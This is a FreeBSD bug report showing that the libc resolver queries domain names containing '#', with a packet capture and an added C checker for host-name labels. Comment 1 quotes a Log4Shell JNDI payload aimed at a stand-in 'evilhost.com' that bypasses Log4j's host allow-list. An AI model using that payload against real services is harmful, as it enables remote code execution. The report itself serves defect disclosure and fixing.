Bug 260770 - libc resolver does not validate domain names
Status: New
Alias: None
Product: Base System
Classification: Unclassified
Component: misc
Version: CURRENT
Hardware: Any Any
Importance: --- Affects Only Me
Assignee: freebsd-bugs (Nobody)
Reported: 2021-12-28 21:38 UTC by Ed Maste
Modified: 2021-12-29 14:19 UTC
Description Ed Maste freebsd_committer freebsd_triage 2021-12-28 21:38:07 UTC
e.g. `host 127.0.0.1#test.example.com` will perform a DNS query as shown below, although # is not a valid character in a domain name

0020                                 da 7c 01 00 00 01             .|....
0030   00 00 00 00 00 00 03 31 32 37 01 30 01 30 06 31   .......127.0.0.1
0040   23 74 65 73 74 07 65 78 61 6d 70 6c 65 03 63 6f   #test.example.co
0050   6d 00 00 01 00 01                                 m.....
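
An added example, not part of the original report and not FreeBSD libc code: a C check that walks the QNAME in the query bytes captured above and reports the first label that breaks the RFC 952/1123 letter-digit-hyphen (LDH) host name rule. The names `label_is_ldh` and `first_bad_label` are hypothetical.

```c
#include <stddef.h>
#include <stdio.h>

/* DNS payload copied from the capture in the report, starting at the
 * transaction ID (da 7c); label text is written as character literals. */
static const unsigned char query[] = {
    0xda,0x7c, 0x01,0x00, 0x00,0x01, 0x00,0x00, 0x00,0x00, 0x00,0x00,
    0x03,'1','2','7', 0x01,'0', 0x01,'0',
    0x06,'1','#','t','e','s','t',
    0x07,'e','x','a','m','p','l','e', 0x03,'c','o','m', 0x00,
    0x00,0x01, 0x00,0x01
};

/* RFC 952/1123 host label: letters, digits, hyphen; no leading or
 * trailing hyphen; 1 to 63 octets. */
static int label_is_ldh(const unsigned char *p, size_t n)
{
    if (n == 0 || n > 63 || p[0] == '-' || p[n - 1] == '-')
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = p[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '-'))
            return 0;
    }
    return 1;
}

/* Walk the QNAME of the first question. Returns the 1-based index of the
 * first non-LDH label, 0 if every label passes, or -1 if the message is
 * truncated or the name uses a compression pointer (not valid here). */
int first_bad_label(const unsigned char *msg, size_t len)
{
    size_t off = 12;                    /* fixed DNS header size */
    for (int idx = 1; off < len; idx++) {
        unsigned char n = msg[off++];
        if (n == 0) return 0;           /* root label: end of name */
        if (n > 63 || n > len - off) return -1;
        if (!label_is_ldh(msg + off, n)) return idx;
        off += n;
    }
    return -1;                          /* ran out of bytes before root */
}

int main(void)
{
    printf("first non-LDH label: %d\n", first_bad_label(query, sizeof query));
    return 0;
}
```

For the captured query the labels are `127`, `0`, `0`, `1#test`, `example`, `com`, so the fourth label is the one that fails the check.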
Comment 1 Ed Maste freebsd_committer freebsd_triage 2021-12-29 01:24:29 UTC
Ref:

https://twitter.com/marcioalm/status/1471740771581652995
> FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks
> in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
> and to bypass allowedClasses just choose a name for a class in the JDK.
> Deserialization will occur as usual. #Log4Shell 1/n

https://twitter.com/Shaquil86300527/status/1472153790463815680
> In my tests, this doesn’t work on Windows and Linux. It does work in MacOS and
> FreeBSD.
> # is not valid for DNS but *some* resolver might query names with # in it.
> TBC for this to work the vulnerable application must run on FreeBSD or MacOS
> and actor must control a DNS domain.